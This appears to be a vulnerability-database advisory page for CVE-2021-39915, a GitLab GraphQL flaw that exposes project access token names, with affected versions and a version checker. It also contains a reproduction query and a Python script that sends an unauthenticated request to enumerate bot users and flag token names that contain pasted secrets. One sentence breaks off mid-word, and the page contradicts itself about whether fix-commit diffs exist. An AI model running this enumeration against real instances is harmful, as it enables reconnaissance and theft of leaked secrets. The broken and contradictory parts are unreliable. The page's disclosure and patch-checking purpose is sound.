CVE-2021-39915
Description
Improper access control in the GraphQL API in GitLab CE/EE affecting all versions starting from 13.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows an attacker to see the names of project access tokens on arbitrary projects
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Improper access control in GitLab GraphQL API allows unauthenticated attackers to enumerate project access token names, revealing sensitive project information.
Vulnerability
An improper access control vulnerability in the GraphQL API of GitLab CE/EE, affecting versions from 13.0 before 14.3.6, 14.4 before 14.4.4, and 14.5 before 14.5.2, allows unauthenticated users to retrieve the names of project access tokens. The issue arises because the API does not enforce proper authorization checks when returning token names, which are inadvertently exposed via the underlying bot user profile information [1].
Exploitation
An attacker with no authentication can query the GitLab GraphQL API to enumerate bot users (for example by searching for `_bot` in usernames) and read the names of the project access tokens those bots back. Token names are often descriptive and may leak information about a private project, such as member names, the project or company name, build tools, or even the token value itself if the owner pasted it into the name [1]. The attack requires no privileges and no user interaction.
Impact
Successful exploitation allows an attacker to see the names of project access tokens on arbitrary projects, potentially revealing sensitive information about private projects. Although the token value itself is not directly exposed, the token name can lead to further enumeration and may disclose project details, membership, or inadvertently embedded secrets [1]. This compromises confidentiality and aids in reconnaissance for targeted attacks.
Mitigation
GitLab addressed this vulnerability in versions 14.3.6, 14.4.4, and 14.5.2, released on 2021-12-13. Administrators of self-managed instances should upgrade to the patched release for their minor line; no workaround is documented for earlier versions. The issue is not listed in CISA KEV as a known exploited vulnerability [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: >=13.0, <14.3.6
- Range: >=14.4, <14.4.4
- Range: >=14.5, <14.5.2
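A version check for the three ranges above, added here as an example and not part of the advisory or GitLab's own tooling. It parses the version strings GitLab instances report (optional leading `v`, optional `-ce`/`-ee` and omnibus `.N` suffixes, an assumed convention) and treats each range as lower-inclusive, upper-exclusive, exactly as the list states.

```python
"""Added version check for the CVE-2021-39915 affected ranges.
Pure Python; no third-party version parser required."""
import re

# (first affected, first fixed) for each affected line, from the list above.
AFFECTED_RANGES = [
    ((13, 0, 0), (14, 3, 6)),
    ((14, 4, 0), (14, 4, 4)),
    ((14, 5, 0), (14, 5, 2)),
]

# Assumed version string shapes: "14.3.5", "14.4", "v14.5.1", "14.3.5-ee",
# "14.3.5-ee.0" (omnibus package style). Anything else is rejected, not guessed.
_VERSION_RE = re.compile(r"v?(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:ce|ee)(?:\.\d+)?)?")


def parse_version(text):
    """'14.3.5-ee' -> (14, 3, 5); '14.4' -> (14, 4, 0); 'v14.5.1-ee.0' -> (14, 5, 1)."""
    m = _VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised GitLab version: {text!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_affected(text):
    """True when the version falls inside any affected range."""
    v = parse_version(text)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def fixed_version_for(text):
    """The patched release that closes the range the version falls in,
    or None when the version is already patched or outside every range."""
    v = parse_version(text)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v < hi:
            return ".".join(map(str, hi))
    return None


if __name__ == "__main__":
    for v in ("13.12.15", "14.3.6", "14.4.3-ee", "14.5.2", "14.6.0"):
        state = "affected" if is_affected(v) else "not affected"
        print(f"{v}: {state}, fix: {fixed_version_for(v)}")
```

Note that a 13.x instance is reported as needing 14.3.6, because the first range runs from 13.0 all the way to that release; the actual upgrade path between those versions is a separate concern.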
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"The GraphQL users endpoint does not require authentication and returns the user-chosen name of bot users, leaking project access token names from private projects."
Attack vector
An unauthenticated attacker sends a GraphQL query to `/-/graphql-explorer` searching for users with `_bot` in the username [ref_id=1]. The API returns the `name` and `username` of every matching bot user, which reveals the project access token name chosen by the project owner. Because bot usernames follow the pattern `project_
Affected code
The GraphQL API endpoint at `/api/graphql` (accessible via `/-/graphql-explorer`) exposes the `users` query with a `search` argument. The underlying resolver returns bot users created for project access tokens, including their `name` field, without requiring authentication [ref_id=1].
What the fix does
The advisory does not include a published patch diff. The expected remediation is to either give bot users generic names (hiding the user-chosen token name) or to prevent bot users from being listed via the public GraphQL API [ref_id=1]. No fix commit is present in the bundle.
Preconditions
- auth: No authentication required; the attacker can be unauthenticated
- config: The target project must have created at least one project access token (premium feature on GitLab.com)
- network: Attacker needs network access to the GitLab instance's GraphQL endpoint
Reproduction
1. Log out of gitlab.com (this works unauthenticated).
2. Go to `https://gitlab.com/-/graphql-explorer`.
3. Execute the query:

```graphql
{
  users(search: "_bot") {
    nodes {
      username
      name
    }
  }
}
```

4. Observe that the response includes the names of project access tokens from private projects [ref_id=1].
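The enumeration from the Exploitation section and the reproduction steps above, as an added example that is not part of the advisory or the HackerOne report. It builds the same `users(search:)` query as a JSON request body for `/api/graphql`, pulls project-bot users out of a reply, and flags token names that look like they contain the token value itself. The bot username pattern `project_<id>_bot[N]` and the secret-spotting regex are assumptions, not from the page; the sample reply is constructed. `enumerate_instance` performs the live request and is only for instances you are authorised to test.

```python
"""Added helper for the CVE-2021-39915 unauthenticated bot-user enumeration.
Builds the reproduction query, parses a reply, and flags suspicious token names."""
import json
import re
import urllib.request

# The reproduction query, with the search term passed as a GraphQL variable
# instead of being spliced into the query text.
USERS_QUERY = """
query BotUsers($search: String!) {
  users(search: $search) {
    nodes { username name }
  }
}
"""

# Assumption: project access token bot accounts are named project_<id>_bot,
# project_<id>_bot1, ... The page only says the usernames contain "_bot".
PROJECT_BOT_RE = re.compile(r"^project_\d+_bot\d*$")

# Heuristic (not from the page): a "glpat-" personal access token prefix or a
# 20+ character alphanumeric run inside a token *name* suggests a pasted secret.
TOKEN_LIKE_RE = re.compile(r"glpat-[A-Za-z0-9_-]{20}|[A-Za-z0-9]{20,}")


def build_request(search="_bot"):
    """JSON body for POST /api/graphql; no Authorization header is sent."""
    return {"query": USERS_QUERY, "variables": {"search": search}}


def extract_bot_users(reply):
    """Return [(username, name)] for project bots in a parsed GraphQL reply.
    Humans whose username merely contains '_bot' are dropped; an error reply
    with data=null yields an empty list."""
    nodes = ((reply.get("data") or {}).get("users") or {}).get("nodes") or []
    return [(n["username"], n.get("name", ""))
            for n in nodes if PROJECT_BOT_RE.match(n.get("username", ""))]


def names_with_embedded_token(bot_users):
    """Token names that appear to contain the token value itself."""
    return [name for _, name in bot_users if TOKEN_LIKE_RE.search(name)]


def enumerate_instance(base_url, search="_bot", timeout=10):
    """Live, unauthenticated check against an instance you may test.
    Returns the project-bot users the endpoint reveals."""
    body = json.dumps(build_request(search)).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/graphql", data=body,
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_bot_users(json.load(resp))


# Constructed sample reply (not a real capture): a descriptive token name,
# a name with a pasted token, and a human user that matches the search term.
SAMPLE_REPLY = json.loads("""
{"data": {"users": {"nodes": [
  {"username": "project_12345_bot",  "name": "acme-prod-deploy-key"},
  {"username": "project_12345_bot1", "name": "backup glpat-abcdefghijklmnopqrst"},
  {"username": "jane_bothwell",      "name": "Jane Bothwell"}
]}}}
""")

if __name__ == "__main__":
    bots = extract_bot_users(SAMPLE_REPLY)
    for username, name in bots:
        print(f"{username}: {name}")
    print("possible embedded secrets:", names_with_embedded_token(bots))
```

On a patched instance the same request either returns no project bots or returns them with generic names, so an empty result from `extract_bot_users` is the expected outcome after upgrading.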
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-39915.json (CONFIRM)
- gitlab.com/gitlab-org/gitlab/-/issues/340803 (MISC)
- hackerone.com/reports/1336059 (MISC)
News mentions
No linked articles in our index yet.